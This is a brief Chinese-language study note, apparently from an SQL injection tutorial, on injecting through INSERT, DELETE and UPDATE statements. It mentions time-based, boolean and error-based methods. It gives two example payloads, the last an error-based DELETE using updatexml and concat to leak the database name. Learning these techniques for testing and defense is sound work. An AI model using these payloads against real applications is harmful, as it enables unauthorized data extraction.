insert:通过增加这种方法,把数据库增加到表中,最后通过查看获得信息
例如在留言板中,通过注入,然后出现在留言板上
insert into 表名 values(null,‘111’,‘select user()’);
delete:只能通过时间注入和布尔注入的时候使用delete注入,通过查看删除一条数据的时间来慢慢测出数据
update:通过修改内容,把内容修改成你想知道的信息,通过查询可知
这三种注入也都支持报错注入
delete from admin where id=6 and 1=updatexml(1,concat(0x3a,(select database())),1);